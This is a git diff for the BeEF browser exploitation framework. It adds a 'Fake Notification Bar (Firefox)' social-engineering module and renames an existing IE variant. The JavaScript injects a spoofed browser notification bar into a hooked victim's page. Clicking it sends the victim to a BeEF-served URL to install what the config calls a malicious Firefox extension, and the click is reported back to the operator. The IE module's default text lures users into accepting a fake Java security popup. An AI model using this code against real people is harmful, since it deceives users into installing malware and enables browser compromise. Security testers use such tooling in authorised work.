diff --git a/modules/social_engineering/fake_notification_ff/command.js b/modules/social_engineering/fake_notification_ff/command.js
new file mode 100644
index 000000000..5bb0b7744
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/command.js
@@ -0,0 +1,36 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var id = beef.dom.generateID();
+ var pid = beef.dom.generateID();
+ var zztop = beef.dom.getHighestZindex()+1;
+ var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+ var ell = beef.dom.createElement('div',{'style':'width: 16px; height: 18px; padding: 0; margin: 3px 0px 5px 5px; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABcAAAAWCAIAAACkFJBSAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAK3SURBVDhPpZD7T1JhHMbPn1NbrdvKmpmtieJdyBuCXA/e8IJRDtOJiEpkNUzEG6QCivWDrlroxDnNbtqWzqwxMZU0jyDayi6uA1vfRF/PUn9i++zsOS/P8+EFzL/xKHgw/8bDw/CtH/rRfxPMD9UD6CEcrY+t8vEh9eay+ZDO3hAs1v38Isy6O1nnQ47Hx4RODGsO7FAPwdK9ny13d0dLKSOJXiDhLs6YDuxQDzG/twsx+Vxj7ysfsylf9Kssxoq8HN6t6uLJsXtvh2vh8PWg6pvLSO2jjPm8lh3WLMqbvNMnjwJnzxyjR4ZzOSlXGdF02oVLoSdPnTjCSLjsfHd/r4+GXgtYzAHINXNVRV58bAQjkZ7MjGWzmLiQnclOhteEOBogyWG73jejPjVgvjVTANLTqVZJYZmbzReLODlZPAjwDCASZMik+OK0fmFK65ltgjIaQgBLB+JZn66nq2looOf6tVwkAlfAy2Uz61RCLuuKQp5KOHTUIVjaET+I3p/uJ+R6r9WshUsFrhMgW8xlpSVFR4WHh52LooXOvNJQh5jP04542a94M6hcnqmvqykQ8NLh+7PwTNiDBQJc0G7r1KjLGuur3E4DdQgWYwDSbczFk+LoIRI8hpkYKeSny0sKbsgkYhEbFPCsKCv84jBtrg5uErZ/f8ruEAJGegw7uA0qRX4ULSwy4mJaSry+oXbBYf84ZVNXl+LCDLAU5fPnp7Sk58E2u6vtgJHuNoTJUMnlJAt4abDp7a78vdK26tDfrpGKBCwQCfmpjok6ah9lsLQiRge0JbI8+P3FRWLdXal3TjduV/I4DGkhriiXqavlrukGah9ljFxtQXxfti7NDS/NjXx2jhCfnm6tGL+6umY/jLico8T8kGexf4top/ZRBktz8IBFHzwYSTQGD/aHaAwesDQEz1/qC1RvBXP1zgAAAABJRU5ErkJggg==);'});
+ var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+ var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+ $j('body').append(el);
+ var hid = '#'+id;
+ var hpid = '#'+pid;
+ $j(hid).append(elp);
+ $j(hpid).html("<%= @notification_text %> 
");
+ $j(hid).append(ell);
+ //$j(hid).append("Problems installing? ");
+ $j(hid).append(elr);
+ $j(hid).click(function() {
+ $j(this).slideUp(300,function() {
+ $j(this).remove();
+ });
+ window.location = '<%= @url %>';
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+ });
+ $j(hid).css('cursor','pointer');
+ $j(hid).slideDown(300,function() {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+ });
+
+});
diff --git a/modules/social_engineering/fake_notification_ff/config.yaml b/modules/social_engineering/fake_notification_ff/config.yaml
new file mode 100644
index 000000000..a501a37aa
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ fake_notification_ff:
+ enable: true
+ category: "Social Engineering"
+ name: "Fake Notification Bar (Firefox)"
+ description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a malicious Firefox extension (by default)."
+ authors: ["xntrik", "bcoles"]
+ target:
+ user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification_ff/img/install.png b/modules/social_engineering/fake_notification_ff/img/install.png
new file mode 100644
index 000000000..fb44d07a6
Binary files /dev/null and b/modules/social_engineering/fake_notification_ff/img/install.png differ
diff --git a/modules/social_engineering/fake_notification_ff/img/jigsaw.png b/modules/social_engineering/fake_notification_ff/img/jigsaw.png
new file mode 100644
index 000000000..74d3c2f8e
Binary files /dev/null and b/modules/social_engineering/fake_notification_ff/img/jigsaw.png differ
diff --git a/modules/social_engineering/fake_notification_ff/img/plugins.png b/modules/social_engineering/fake_notification_ff/img/plugins.png
new file mode 100644
index 000000000..73104156c
Binary files /dev/null and b/modules/social_engineering/fake_notification_ff/img/plugins.png differ
diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb
new file mode 100644
index 000000000..fba9d4154
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/module.rb
@@ -0,0 +1,32 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification_ff < BeEF::Core::Command
+
+ def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+ url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension'
+ return [
+ {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},
+ { 'name' => 'notification_text',
+ 'description' => 'Text displayed in the notification bar',
+ 'ui_label' => 'Notification text',
+ 'value' => "An additional plug-in is required to display some elements on this page."
+ }
+ ]
+ end
+
+ #
+ # This method is being called when a zombie sends some
+ # data back to the framework.
+ #
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+ end
+
+end
diff --git a/modules/social_engineering/fake_notification/command.js b/modules/social_engineering/fake_notification_ie/command.js
similarity index 100%
rename from modules/social_engineering/fake_notification/command.js
rename to modules/social_engineering/fake_notification_ie/command.js
diff --git a/modules/social_engineering/fake_notification/config.yaml b/modules/social_engineering/fake_notification_ie/config.yaml
similarity index 64%
rename from modules/social_engineering/fake_notification/config.yaml
rename to modules/social_engineering/fake_notification_ie/config.yaml
index fb4ccf970..25604d287 100644
--- a/modules/social_engineering/fake_notification/config.yaml
+++ b/modules/social_engineering/fake_notification_ie/config.yaml
@@ -5,11 +5,11 @@
#
beef:
module:
- fake_notification:
+ fake_notification_ie:
enable: true
category: "Social Engineering"
- name: "Fake Notification"
- description: "Displays a fake notification at the top of the screen, similar to those presented in IE."
+ name: "Fake Notification Bar (IE)"
+ description: "Displays a fake notification bar at the top of the screen, similar to those presented in IE."
authors: ["xntrik"]
target:
user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification/module.rb b/modules/social_engineering/fake_notification_ie/module.rb
similarity index 86%
rename from modules/social_engineering/fake_notification/module.rb
rename to modules/social_engineering/fake_notification_ie/module.rb
index c169f99a5..ff55ea7d5 100644
--- a/modules/social_engineering/fake_notification/module.rb
+++ b/modules/social_engineering/fake_notification_ie/module.rb
@@ -3,13 +3,13 @@
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
-class Fake_notification < BeEF::Core::Command
+class Fake_notification_ie < BeEF::Core::Command
def self.options
return [
{ 'name' => 'notification_text',
'description' => 'Text displayed in the notification bar',
- 'ui_label' => 'Text displayed in the notification bar',
+ 'ui_label' => 'Notification text',
'value' => "This website wants to run the following applet: \\'Java\\' from \\'Microsoft Inc\\'. To continue using this website you must accept the following security popup"
}
]